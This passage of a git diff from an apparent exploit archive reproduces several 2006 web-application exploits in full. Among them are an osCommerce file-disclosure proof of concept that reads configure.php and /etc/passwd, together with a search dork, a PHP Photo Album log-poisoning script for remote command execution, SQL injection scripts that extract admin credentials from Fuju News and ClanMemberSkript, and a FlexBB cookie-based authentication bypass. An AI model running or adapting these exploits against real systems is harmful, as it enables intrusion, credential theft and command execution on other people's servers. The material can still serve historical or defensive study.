-inurl:"extras/update.php" intext:mysql.php -display
-
---------------------------------------------------------------------------------
-rgod
-
-site: http://retrogod.altervista.org
-mail: rgod at autistici.org
-original advisory: http://retrogod.altervista.org/oscommerce_22_adv.html
---------------------------------------------------------------------------------
-
-# milw0rm.com [2006-04-14]
+---- osCommerce <= 2.2 "extras/" information/source code disclosure ------------
+
+software site: http://www.oscommerce.com/
+
+
+if extras/ folder is placed inside the www path, you can see all files on target
+system, including php source code with database details, poc:
+
+http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
+http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/passwd
+
+this is the vulnerable code in update.php:
+
+...
+	include '../mysql.php';
+	// if a readme.txt file exists, display it to the user
+	if(!$read_me) {
+		if(file_exists('readme.txt')) {
+			$readme_file = 'readme.txt';
+		}
+		elseif(file_exists('README')) {
+			$readme_file = 'README';
+		}
+		elseif(file_exists('readme')) {
+			$readme_file = 'readme';
+		}
+		if($readme_file) {
+			$readme = file($readme_file);
+			print "
    \n";
+			print nl2br(htmlentities(implode($readme, ' ')));
+			print "
    Continue
    \n";
+			print "
    \n";
+			exit;
+		}
+	}
+...
+
+google search:
+
+inurl:"extras/update.php" intext:mysql.php -display
+
+--------------------------------------------------------------------------------
+rgod
+
+site: http://retrogod.altervista.org
+mail: rgod at autistici.org
+original advisory: http://retrogod.altervista.org/oscommerce_22_adv.html
+--------------------------------------------------------------------------------
+
+# milw0rm.com [2006-04-14]
diff --git a/platforms/php/webapps/1678.php b/platforms/php/webapps/1678.php
index b41984418..ed8ccf5fc 100755
--- a/platforms/php/webapps/1678.php
+++ b/platforms/php/webapps/1678.php
@@ -1,222 +1,222 @@
-#!/usr/bin/php -q -d short_open_tag=on
- this works with magic_quotes_gpc=Off & register_globals=On\r\n";
-echo "dork: \"powered by php photo album\" -demo2 -pitanje\r\n\r\n";
-
-if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to php album\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /phppa/ \r\n";
-echo "php ".$argv[0]." localhost /phppa/ ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
-die;
-}
-/*
- software site: http://www.phpalbum.net/
-
-vulnerable code in language.php at line 21-23:
- "next",
-"ID_PREV" => "previous",
-"ID_NEXT_PAGE" => "next page",
-"ID_PREV_PAGE" => "previous page",
-"ID_ALBUM_NAME" => "Photoalbum",
-"ID_PHOTO_DIR" => "Photos",
-"ID_SETUP" => "setup",
-"ID_HOME" => "Home",
-"ID_NAME" => "Name",
-"ID_EMAIL" => "Email",
-"ID_NAME_EMAIL" => "Optional you can enter your name and email",
-"ID_COMMENT_INSTR" => "Please type your message click Add New Comment",
-"ID_ADD_COMMENT" => "Add new comment",
-"ID_ENTER_PASSWD" => "Enter password:",
-"ID_DELETE_COMMENT" => "Delete Comment",
-"ID_ALBUMS" => "Albums"
-);
-
-if(file_exists($data_dir."translation.dat")){
-	include($data_dir."translation.dat");
-}
-....
-
-"data_dir" argument is uninitialized, so:
-i)  if magic_quotes_gpc = off and register_globals = On you can include
-    arbitrary files from local resources
-ii) against PHP5, if register_globals = On and allow_url_fopen = 0n,
-    you can include an arbitrary translation.dat file from a ftp resource, poc:
-
-    http://[target]/[path]/language.php?cmd=ls%20-la&data_dir=ftp://Anonymous:somemail.com@somehost.com/public/
-
-this is the code for i), you can do ii) manually
-									      */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$cmd="";$port=80;$proxy="";
-
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-echo "[1] Injecting some code in log files...\r\n";
-$CODE ='suntzusuntzu';
-$packet.="GET ".$path.$CODE." HTTP/1.1\r\n";
-$packet.="User-Agent: ".$CODE."\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: close\r\n\r\n";
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-sleep(2);
-
-# fill with possible locations
-$paths= array (
-"/var/log/httpd/access_log",
-"/var/log/httpd/error_log",
-"../apache/logs/error.log",
-"../apache/logs/access.log",
-"../../apache/logs/error.log",
-"../../apache/logs/access.log",
-"../../../apache/logs/error.log",
-"../../../apache/logs/access.log",
-"../../../../apache/logs/error.log",
-"../../../../apache/logs/access.log",
-"../../../../../apache/logs/error.log",
-"../../../../../apache/logs/access.log",
-"../logs/error.log",
-"../logs/access.log",
-"../../logs/error.log",
-"../../logs/access.log",
-"../../../logs/error.log",
-"../../../logs/access.log",
-"../../../../logs/error.log",
-"../../../../logs/access.log",
-"../../../../../logs/error.log",
-"../../../../../logs/access.log",
-"/etc/httpd/logs/acces_log",
-"/etc/httpd/logs/acces.log",
-"/etc/httpd/logs/error_log",
-"/etc/httpd/logs/error.log",
-"/var/www/logs/access_log",
-"/var/www/logs/access.log",
-"/usr/local/apache/logs/access_log",
-"/usr/local/apache/logs/access.log",
-"/var/log/apache/access_log",
-"/var/log/apache/access.log",
-"/var/log/access_log",
-"/var/www/logs/error_log",
-"/var/www/logs/error.log",
-"/usr/local/apache/logs/error_log",
-"/usr/local/apache/logs/error.log",
-"/var/log/apache/error_log",
-"/var/log/apache/error.log",
-"/var/log/access_log",
-"/var/log/error_log"
-);
-
-for ($i=0; $i<=count($paths)-1; $i++)
-{
-$a=$i+2;
-echo "[".$a."] trying with ".$paths[$i]."%00 ...\r\n";
-$packet ="GET ".$p."language.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: data_dir=".$paths[$i]."%00; cmd=".$cmd."\r\n"; //through cookies, log this ;)
-$packet.="Connection: Close\r\n\r\n";
-//echo quick_dump($packet);
-sendpacketii($packet);
-if (strstr($html,"suntzu"))
-{
- echo "Exploit succeeded...\r\n";
- $temp=explode("suntzu",$html);
- die($temp[1]);
-}
-}
-//if you are here...
-echo "Exploit failed...";
-?>
-
-# milw0rm.com [2006-04-15]
+#!/usr/bin/php -q -d short_open_tag=on
+ this works with magic_quotes_gpc=Off & register_globals=On\r\n";
+echo "dork: \"powered by php photo album\" -demo2 -pitanje\r\n\r\n";
+
+if ($argc<4) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to php album\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /phppa/ \r\n";
+echo "php ".$argv[0]." localhost /phppa/ ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
+die;
+}
+/*
+ software site: http://www.phpalbum.net/
+
+vulnerable code in language.php at line 21-23:
+ "next",
+"ID_PREV" => "previous",
+"ID_NEXT_PAGE" => "next page",
+"ID_PREV_PAGE" => "previous page",
+"ID_ALBUM_NAME" => "Photoalbum",
+"ID_PHOTO_DIR" => "Photos",
+"ID_SETUP" => "setup",
+"ID_HOME" => "Home",
+"ID_NAME" => "Name",
+"ID_EMAIL" => "Email",
+"ID_NAME_EMAIL" => "Optional you can enter your name and email",
+"ID_COMMENT_INSTR" => "Please type your message click Add New Comment",
+"ID_ADD_COMMENT" => "Add new comment",
+"ID_ENTER_PASSWD" => "Enter password:",
+"ID_DELETE_COMMENT" => "Delete Comment",
+"ID_ALBUMS" => "Albums"
+);
+
+if(file_exists($data_dir."translation.dat")){
+	include($data_dir."translation.dat");
+}
+....
+
+"data_dir" argument is uninitialized, so:
+i)  if magic_quotes_gpc = off and register_globals = On you can include
+    arbitrary files from local resources
+ii) against PHP5, if register_globals = On and allow_url_fopen = 0n,
+    you can include an arbitrary translation.dat file from a ftp resource, poc:
+
+    http://[target]/[path]/language.php?cmd=ls%20-la&data_dir=ftp://Anonymous:somemail.com@somehost.com/public/
+
+this is the code for i), you can do ii) manually
+									      */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$cmd="";$port=80;$proxy="";
+
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+echo "[1] Injecting some code in log files...\r\n";
+$CODE ='suntzusuntzu';
+$packet.="GET ".$path.$CODE." HTTP/1.1\r\n";
+$packet.="User-Agent: ".$CODE."\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: close\r\n\r\n";
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+sleep(2);
+
+# fill with possible locations
+$paths= array (
+"/var/log/httpd/access_log",
+"/var/log/httpd/error_log",
+"../apache/logs/error.log",
+"../apache/logs/access.log",
+"../../apache/logs/error.log",
+"../../apache/logs/access.log",
+"../../../apache/logs/error.log",
+"../../../apache/logs/access.log",
+"../../../../apache/logs/error.log",
+"../../../../apache/logs/access.log",
+"../../../../../apache/logs/error.log",
+"../../../../../apache/logs/access.log",
+"../logs/error.log",
+"../logs/access.log",
+"../../logs/error.log",
+"../../logs/access.log",
+"../../../logs/error.log",
+"../../../logs/access.log",
+"../../../../logs/error.log",
+"../../../../logs/access.log",
+"../../../../../logs/error.log",
+"../../../../../logs/access.log",
+"/etc/httpd/logs/acces_log",
+"/etc/httpd/logs/acces.log",
+"/etc/httpd/logs/error_log",
+"/etc/httpd/logs/error.log",
+"/var/www/logs/access_log",
+"/var/www/logs/access.log",
+"/usr/local/apache/logs/access_log",
+"/usr/local/apache/logs/access.log",
+"/var/log/apache/access_log",
+"/var/log/apache/access.log",
+"/var/log/access_log",
+"/var/www/logs/error_log",
+"/var/www/logs/error.log",
+"/usr/local/apache/logs/error_log",
+"/usr/local/apache/logs/error.log",
+"/var/log/apache/error_log",
+"/var/log/apache/error.log",
+"/var/log/access_log",
+"/var/log/error_log"
+);
+
+for ($i=0; $i<=count($paths)-1; $i++)
+{
+$a=$i+2;
+echo "[".$a."] trying with ".$paths[$i]."%00 ...\r\n";
+$packet ="GET ".$p."language.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: data_dir=".$paths[$i]."%00; cmd=".$cmd."\r\n"; //through cookies, log this ;)
+$packet.="Connection: Close\r\n\r\n";
+//echo quick_dump($packet);
+sendpacketii($packet);
+if (strstr($html,"suntzu"))
+{
+ echo "Exploit succeeded...\r\n";
+ $temp=explode("suntzu",$html);
+ die($temp[1]);
+}
+}
+//if you are here...
+echo "Exploit failed...";
+?>
+
+# milw0rm.com [2006-04-15]
diff --git a/platforms/php/webapps/1682.php b/platforms/php/webapps/1682.php
index ae3a7a678..bcaa51297 100755
--- a/platforms/php/webapps/1682.php
+++ b/platforms/php/webapps/1682.php
@@ -1,91 +1,91 @@
-> Internet Security           |                         
- |---==============================================================---|
- 
-        title: fuju news 1.0 remote sql injection
-      release: 2006-04-16
-       author: snatcher [snatcher at gmx.ch]
-      country: switzerland  |+|
-	  
-  application: Fuju News 1.0
-  description: a php / mysql based newsscript
-     download: http://www.clanscripte.net/main.php?content=download&do=file&dlid=243
-  description: you can get the password with a simple sql injection.
-       greets: honkey, str0ke <- good exploit publisher :),
-			   all security guys and coders over the world
- terms of use: this exploit is just for educational purposes, do not use it for illegal acts.
-
-
----------------------------- archiv2.php - line 25 --------------------------------------
-$result1 =@mysql_query("SELECT * FROM news_sql WHERE ID LIKE $ID");
------------------------------------------------------------------------------------------
-
-because this $ID isn't escaped correctly you can insert malicious sql code,
-i.e. with a union operator.
-
-
-title: fuju news 1.0 restriction bypass
-
-------------------------- edit_kategorie.php - line 19 ----------------------------------
-$authorized=$HTTP_COOKIE_VARS['authorized'];
------------------------------------------------------------------------------------------
-
-that's the mistake of the code. you only have to create a session cookie named 'authorized'
-with the value 1, and you are logged in.
-
-*/
-/*********************** CONFIGURATION ****************************/
-
-$PATH_TO_FILE  = 'http://yourhost.com/fuju/archiv2.php';           // in example: http://yourhost.com/fuju/archiv2.php
-$TABLE_PREFIX  = '';                                               // default: empty
-$GET_VARS      = '?ID=';                                           // do not change
-$SQL_INJECTION = '-666 union select pw,0,0,benutzer,0,0,pw from '. // do not change
-                 $TABLE_PREFIX.'admin_sql /*';
-
-
-/**************************** MAIN ********************************/
-
-$file_array = file($PATH_TO_FILE.$GET_VARS.urlencode($SQL_INJECTION))or die('couldn\'t open host!'); 
-foreach ($file_array as $now)                               
-	$html_content .= $now;
-
-$html_content = str_castrate($html_content);
-
-preg_match_all("!Autor:".
-               "(.*?)!",
-			   $html_content,$username); /* gets username */
-preg_match_all("!Kategorie:
    (.*?)!", 
-                $html_content,$password); /* gets password */
-
-if ($username[1][0] && $password[1][0]) {
-	echo 'username: '.$username[1][0].'
    ';
-	echo 'password: '.$password[1][0].'';
-}else {
-	echo 'exploit failed! 
    ';
-}
-echo '




    
-======================================================================
    
-exploit: fuju news 1.0 remote sql injection
    
-release: 2006-04-16
    
-author: snatcher [snatcher at gmx.ch]
    
-======================================================================';
-
-function str_castrate($string) {
-	$string = str_replace("\n", '', $string);
-	$string = str_replace("\r", '', $string);
-	$string = str_replace(" ", '', $string);
-	return $string;
-}
-?>
-
-# milw0rm.com [2006-04-16]
+> Internet Security           |                         
+ |---==============================================================---|
+ 
+        title: fuju news 1.0 remote sql injection
+      release: 2006-04-16
+       author: snatcher [snatcher at gmx.ch]
+      country: switzerland  |+|
+	  
+  application: Fuju News 1.0
+  description: a php / mysql based newsscript
+     download: http://www.clanscripte.net/main.php?content=download&do=file&dlid=243
+  description: you can get the password with a simple sql injection.
+       greets: honkey, str0ke <- good exploit publisher :),
+			   all security guys and coders over the world
+ terms of use: this exploit is just for educational purposes, do not use it for illegal acts.
+
+
+---------------------------- archiv2.php - line 25 --------------------------------------
+$result1 =@mysql_query("SELECT * FROM news_sql WHERE ID LIKE $ID");
+-----------------------------------------------------------------------------------------
+
+because this $ID isn't escaped correctly you can insert malicious sql code,
+i.e. with a union operator.
+
+
+title: fuju news 1.0 restriction bypass
+
+------------------------- edit_kategorie.php - line 19 ----------------------------------
+$authorized=$HTTP_COOKIE_VARS['authorized'];
+-----------------------------------------------------------------------------------------
+
+that's the mistake of the code. you only have to create a session cookie named 'authorized'
+with the value 1, and you are logged in.
+
+*/
+/*********************** CONFIGURATION ****************************/
+
+$PATH_TO_FILE  = 'http://yourhost.com/fuju/archiv2.php';           // in example: http://yourhost.com/fuju/archiv2.php
+$TABLE_PREFIX  = '';                                               // default: empty
+$GET_VARS      = '?ID=';                                           // do not change
+$SQL_INJECTION = '-666 union select pw,0,0,benutzer,0,0,pw from '. // do not change
+                 $TABLE_PREFIX.'admin_sql /*';
+
+
+/**************************** MAIN ********************************/
+
+$file_array = file($PATH_TO_FILE.$GET_VARS.urlencode($SQL_INJECTION))or die('couldn\'t open host!'); 
+foreach ($file_array as $now)                               
+	$html_content .= $now;
+
+$html_content = str_castrate($html_content);
+
+preg_match_all("!Autor:".
+               "(.*?)!",
+			   $html_content,$username); /* gets username */
+preg_match_all("!Kategorie:
    (.*?)!", 
+                $html_content,$password); /* gets password */
+
+if ($username[1][0] && $password[1][0]) {
+	echo 'username: '.$username[1][0].'
    ';
+	echo 'password: '.$password[1][0].'';
+}else {
+	echo 'exploit failed! 
    ';
+}
+echo '




    
+======================================================================
    
+exploit: fuju news 1.0 remote sql injection
    
+release: 2006-04-16
    
+author: snatcher [snatcher at gmx.ch]
    
+======================================================================';
+
+function str_castrate($string) {
+	$string = str_replace("\n", '', $string);
+	$string = str_replace("\r", '', $string);
+	$string = str_replace(" ", '', $string);
+	return $string;
+}
+?>
+
+# milw0rm.com [2006-04-16]
diff --git a/platforms/php/webapps/1683.php b/platforms/php/webapps/1683.php
index 8a92dae14..3bcc56cc0 100755
--- a/platforms/php/webapps/1683.php
+++ b/platforms/php/webapps/1683.php
@@ -1,86 +1,86 @@
-> Internet Security           |                         
- |---==============================================================---|
- 
-        title: Blackorpheus ClanMemberSkript 1.0 remote sql injection
-      release: 2006-04-16
-       author: snatcher [snatcher at gmx.ch]
-      country: switzerland  |+|
-	  
-  application: Blackorpheus ClanMemberSkript 1.0
-  description: a php / mysql based member management system
-     download: http://www.clanscripte.net/main.php?content=download&do=file&dlid=21
-  description: you can get each password with a simple sql injection. the password 
-               is plaintext :)
-  fingerprint: google -> "powered by ClanMemberSkript" -> 18
-       greets: honkey, str0ke <- good exploit publisher :),
-			   all security guys and coders over the world,
- terms of use: this exploit is just for educational purposes, do not use it for illegal acts.
-
-
----------------------------- member.php - line 7 -------------------------------------
-$result = MYSQL_QUERY(" SELECT * FROM $member_tab WHERE userID=$userID ");
------------------------------------------------------------------------------------------
-
-because this $userID isn't escaped correctly you can insert malicious sql code,
-i.e. with a union operator.
-
-
-*/
-
-/*********************** CONFIGURATION ****************************/
-
-$PATH_TO_FILE  = 'http://yourhost.com/member.php';                 // in example: http://yourhost.com/member.php
-$USER_ID       = 1;                                                // which user? default: 1
-$TABLE_PREFIX  = '';                                               // default: empty
-$GET_VARS      = '?userID=';                                       // do not change
-$SQL_INJECTION = '-666 union select 0,0,0,0,0,0,0,0,0,nick,pass,'. // do not change
-                 '0,0,0,0,0,0,0,0,0,0,0,0 from '.$TABLE_PREFIX.
-				 'membersettings where userID = '.$USER_ID.' limit 1/*';
-
-
-/**************************** MAIN ********************************/
-
-$file_array = file($PATH_TO_FILE.$GET_VARS.urlencode($SQL_INJECTION))or die('couldn\'t open host!'); 
-foreach ($file_array as $now)                               
-	$html_content .= $now;
-
-$html_content = str_castrate($html_content);
-
-preg_match_all("!Geburtsdatum:    (.*?)    !",
-			   $html_content,$username); /* gets username */
-preg_match_all("!Wohnort:    (.*?)!", 
-                $html_content,$password); /* gets password */
-
-if ($username[1][0] && $password[1][0]) {
-	echo 'username: '.$username[1][0].'
    ';
-	echo 'password: '.$password[1][0].'';
-}else {
-	echo 'exploit failed! 
    ';
-}
-echo '




    
-======================================================================
    
-exploit: Blackorpheus ClanMemberSkript 1.0 remote sql injection
    
-release: 2006-04-16
    
-author: snatcher [snatcher at gmx.ch]
    
-======================================================================';
-
-function str_castrate($string) {
-	$string = str_replace("\n", '', $string);
-	$string = str_replace("\r", '', $string);
-	$string = str_replace(" ", '', $string);
-	return $string;
-}
-?>
-
-# milw0rm.com [2006-04-16]
+> Internet Security           |                         
+ |---==============================================================---|
+ 
+        title: Blackorpheus ClanMemberSkript 1.0 remote sql injection
+      release: 2006-04-16
+       author: snatcher [snatcher at gmx.ch]
+      country: switzerland  |+|
+	  
+  application: Blackorpheus ClanMemberSkript 1.0
+  description: a php / mysql based member management system
+     download: http://www.clanscripte.net/main.php?content=download&do=file&dlid=21
+  description: you can get each password with a simple sql injection. the password 
+               is plaintext :)
+  fingerprint: google -> "powered by ClanMemberSkript" -> 18
+       greets: honkey, str0ke <- good exploit publisher :),
+			   all security guys and coders over the world,
+ terms of use: this exploit is just for educational purposes, do not use it for illegal acts.
+
+
+---------------------------- member.php - line 7 -------------------------------------
+$result = MYSQL_QUERY(" SELECT * FROM $member_tab WHERE userID=$userID ");
+-----------------------------------------------------------------------------------------
+
+because this $userID isn't escaped correctly you can insert malicious sql code,
+i.e. with a union operator.
+
+
+*/
+
+/*********************** CONFIGURATION ****************************/
+
+$PATH_TO_FILE  = 'http://yourhost.com/member.php';                 // in example: http://yourhost.com/member.php
+$USER_ID       = 1;                                                // which user? default: 1
+$TABLE_PREFIX  = '';                                               // default: empty
+$GET_VARS      = '?userID=';                                       // do not change
+$SQL_INJECTION = '-666 union select 0,0,0,0,0,0,0,0,0,nick,pass,'. // do not change
+                 '0,0,0,0,0,0,0,0,0,0,0,0 from '.$TABLE_PREFIX.
+				 'membersettings where userID = '.$USER_ID.' limit 1/*';
+
+
+/**************************** MAIN ********************************/
+
+$file_array = file($PATH_TO_FILE.$GET_VARS.urlencode($SQL_INJECTION))or die('couldn\'t open host!'); 
+foreach ($file_array as $now)                               
+	$html_content .= $now;
+
+$html_content = str_castrate($html_content);
+
+preg_match_all("!Geburtsdatum:(.*?)!",
+			   $html_content,$username); /* gets username */
+preg_match_all("!Wohnort:(.*?)!", 
+                $html_content,$password); /* gets password */
+
+if ($username[1][0] && $password[1][0]) {
+	echo 'username: '.$username[1][0].'
    ';
+	echo 'password: '.$password[1][0].'';
+}else {
+	echo 'exploit failed! 
    ';
+}
+echo '




    
+======================================================================
    
+exploit: Blackorpheus ClanMemberSkript 1.0 remote sql injection
    
+release: 2006-04-16
    
+author: snatcher [snatcher at gmx.ch]
    
+======================================================================';
+
+function str_castrate($string) {
+	$string = str_replace("\n", '', $string);
+	$string = str_replace("\r", '', $string);
+	$string = str_replace(" ", '', $string);
+	return $string;
+}
+?>
+
+# milw0rm.com [2006-04-16]
diff --git a/platforms/php/webapps/1686.pl b/platforms/php/webapps/1686.pl
index 38f9c8ab4..383f73489 100755
--- a/platforms/php/webapps/1686.pl
+++ b/platforms/php/webapps/1686.pl
@@ -1,52 +1,52 @@
-#!/usr/bin/perl -w
-
-# FlexBB <= 0.5.5 (/inc/start.php _COOKIE) Remote SQL ByPass Exploit , Perl C0d3
-#
-# Milw0rm ID :-
-#                        http://www.milw0rm.com/auth.php?id=1539
-# D3vil-0x1 | Devil-00 < BlackHat > :)
-#
-# DONT FORGET TO DO YOUR CONFIG !!
-# DONT FORGET TO DO YOUR CONFIG !!
-# DONT FORGET TO DO YOUR CONFIG !!
-use IO::Socket;
-
-##-- Start --#
-
-$host         = "127.0.0.1";
-$path         = "/flexbb/";
-
-##-- _END_ --##
-#        $host                :-
-#                                The Host Name Without http:// | exm. www.vic.com
-#
-#        $path                :-
-#                                FlexBB Dir On Server | exm. /flexbb/
-
-$sock = IO::Socket::INET->new (
-                                                                                PeerAddr => "$host",
-                                                                                PeerPort        => "80",
-                                                                                Proto                => "tcp"
-                                                                                ) or die("[!] Connect To Server Was Filed");
-##-- DONT TRY TO EDIT ME --##
-$evilcookie = "flexbb_username='UNION SELECT id,username,password,4,usertype,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 FROM flexbb_users WHERE id=1/*;";
-##-- DONT TRY TO EDIT ME --##
-$evildata  = "GET ".$path."index.php?action=buddypopup HTTP/1.1\n";
-$evildata .= "Host: $host \n";
-$evildata .= "Accept: */* \n";
-$evildata .= "Keep-Alive: 300\n";
-$evildata .= "Connection: keep-alive \n";
-$evildata .= "Cookie: ".$evilcookie."\n\n";
-
-print $sock $evildata;
-
-while($ans = <$sock>){
-#
-        if($ans =~ m/(.*?)<\/a>/){
-            print "\n[+] Bypass [ OKAY ] Edit your cookies  :-\n\n";
-            print "\tflexbb_username='UNION SELECT id,username,password,4,usertype,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 FROM flexbb_users WHERE id=1/*;\n\n";
-            exit;
-        }
-}
-
-# milw0rm.com [2006-04-17]
+#!/usr/bin/perl -w
+
+# FlexBB <= 0.5.5 (/inc/start.php _COOKIE) Remote SQL ByPass Exploit , Perl C0d3
+#
+# Milw0rm ID :-
+#                        http://www.milw0rm.com/auth.php?id=1539
+# D3vil-0x1 | Devil-00 < BlackHat > :)
+#
+# DONT FORGET TO DO YOUR CONFIG !!
+# DONT FORGET TO DO YOUR CONFIG !!
+# DONT FORGET TO DO YOUR CONFIG !!
+use IO::Socket;
+
+##-- Start --#
+
+$host         = "127.0.0.1";
+$path         = "/flexbb/";
+
+##-- _END_ --##
+#        $host                :-
+#                                The Host Name Without http:// | exm. www.vic.com
+#
+#        $path                :-
+#                                FlexBB Dir On Server | exm. /flexbb/
+
+$sock = IO::Socket::INET->new (
+                                                                                PeerAddr => "$host",
+                                                                                PeerPort        => "80",
+                                                                                Proto                => "tcp"
+                                                                                ) or die("[!] Connect To Server Was Filed");
+##-- DONT TRY TO EDIT ME --##
+$evilcookie = "flexbb_username='UNION SELECT id,username,password,4,usertype,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 FROM flexbb_users WHERE id=1/*;";
+##-- DONT TRY TO EDIT ME --##
+$evildata  = "GET ".$path."index.php?action=buddypopup HTTP/1.1\n";
+$evildata .= "Host: $host \n";
+$evildata .= "Accept: */* \n";
+$evildata .= "Keep-Alive: 300\n";
+$evildata .= "Connection: keep-alive \n";
+$evildata .= "Cookie: ".$evilcookie."\n\n";
+
+print $sock $evildata;
+
+while($ans = <$sock>){
+#
+        if($ans =~ m/(.*?)<\/a>/){
+            print "\n[+] Bypass [ OKAY ] Edit your cookies  :-\n\n";
+            print "\tflexbb_username='UNION SELECT id,username,password,4,usertype,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 FROM flexbb_users WHERE id=1/*;\n\n";
+            exit;
+        }
+}
+
+# milw0rm.com [2006-04-17]
diff --git a/platforms/php/webapps/1687.txt b/platforms/php/webapps/1687.txt
index 3b3c3e30b..c955410c4 100755
--- a/platforms/php/webapps/1687.txt
+++ b/platforms/php/webapps/1687.txt
